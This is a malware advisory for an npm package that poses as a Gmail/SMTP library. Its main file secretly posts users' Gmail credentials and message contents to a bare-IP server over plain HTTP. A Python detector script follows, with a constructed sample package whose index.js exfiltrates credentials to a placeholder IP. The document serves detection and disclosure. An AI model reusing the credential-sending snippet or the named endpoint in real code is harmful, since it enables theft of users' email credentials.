OSV ID: MAL-2026-4557
Ecosystem: npm
Summary:
The package advertises itself as a Gmail/SMTP sender library. The README documents that callers pass their SMTP user and pass (Gmail App Password) to a send() function that talks SMTP/TLS directly to the user's mail server. In reality, index.js (the package main) does not use the bundled lib/mailer.js SMTP implementation at all. Instead, send() spreads the caller-supplied data (including user, pass, from, to, subject, and body) into a JSON payload and POSTs it to http://54.90.254.81:3000/send over cleartext HTTP (index.js lines 7-22). lib/mailer.js exists as decoy code matching the README's 'How It Works' section but is only imported by server.js, the attacker's relay server, never by the package main. Every consumer following the documented usage hands their Gmail address and App Password, plus all recipient addresses and message content, to a bare-IP endpoint over plaintext HTTP on the first call to the package's advertised API.
Source: amazon-inspector (ea463f516048086ec4acfc2733edc9561dac749d19c2e47381fc170c451cd53c)
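The two traits the summary describes (the package main posting to a literal-IP endpoint over cleartext HTTP, and the advertised implementation under lib/ never being reached from that main) are both checkable statically. The script below is an added example, not part of the OSV record or of the package; it runs the two checks over a constructed in-memory package (placeholder TEST-NET address 192.0.2.10, not the advisory's real endpoint) and is a heuristic, not a complete malware detector.

```python
import ipaddress
import json
import posixpath
import re

# Constructed sample package (not the real one): the README-advertised SMTP
# code lives in lib/mailer.js, but the main entry point ignores it and posts
# the caller's credentials to a bare-IP endpoint over plain HTTP.
SAMPLE_PACKAGE = {
    "package.json": json.dumps({"name": "example-mailer", "main": "index.js"}),
    "index.js": (
        "const http = require('http');\n"
        "async function send({ user, pass, from, to, subject, body }) {\n"
        "  const payload = JSON.stringify({ user, pass, from, to, subject, body });\n"
        "  const req = http.request('http://192.0.2.10:3000/send', { method: 'POST' });\n"
        "  req.end(payload);\n"
        "}\n"
        "module.exports = { send };\n"
    ),
    "lib/mailer.js": "const tls = require('tls');\nmodule.exports = { sendSmtp: () => {} };\n",
    "server.js": "const mailer = require('./lib/mailer');\n",  # decoy only reached from here
}

# scheme, host, optional port, optional path of any http(s) URL literal
URL_RE = re.compile(r"""(https?)://([^\s'"`/:]+)(?::(\d+))?(/[^\s'"`]*)?""")
# module specifier of require('x') and `import ... from 'x'`
REQUIRE_RE = re.compile(r"""(?:require\(\s*|from\s+)['"]([^'"]+)['"]""")


def bare_ip_endpoints(source):
    """Return (scheme, host, port) for every URL literal whose host is an IP address."""
    hits = []
    for scheme, host, port, _path in URL_RE.findall(source):
        try:
            ipaddress.ip_address(host)
        except ValueError:
            continue  # hostname, not a bare IP
        hits.append((scheme, host, int(port) if port else None))
    return hits


def local_imports(source, importer):
    """Resolve relative require()/import specifiers in `source` to package-relative paths."""
    base = posixpath.dirname(importer)
    resolved = set()
    for spec in REQUIRE_RE.findall(source):
        if spec.startswith("."):
            path = posixpath.normpath(posixpath.join(base, spec))
            resolved.add(path if path.endswith(".js") else path + ".js")
    return resolved


def audit_package(files):
    """Flag the decoy-library pattern: main posts to a cleartext bare-IP endpoint
    while bundled modules under lib/ are never imported from main."""
    main = json.loads(files["package.json"]).get("main", "index.js")
    main_src = files[main]
    endpoints = bare_ip_endpoints(main_src)
    reachable = local_imports(main_src, main)
    bundled = {p for p in files if p.startswith("lib/") and p.endswith(".js")}
    report = {
        "main": main,
        "cleartext_ip_endpoints": [f"{h}:{p}" for s, h, p in endpoints if s == "http"],
        "unreached_bundled_modules": sorted(bundled - reachable),
    }
    report["suspicious"] = bool(report["cleartext_ip_endpoints"]) and bool(
        report["unreached_bundled_modules"]
    )
    return report


if __name__ == "__main__":
    print(json.dumps(audit_package(SAMPLE_PACKAGE), indent=2))
```

To run it against a real tarball, populate the dict from the extracted `package/` directory; the import resolution only follows relative specifiers, so a main that reaches lib/ through a re-export chain needs the helper applied transitively.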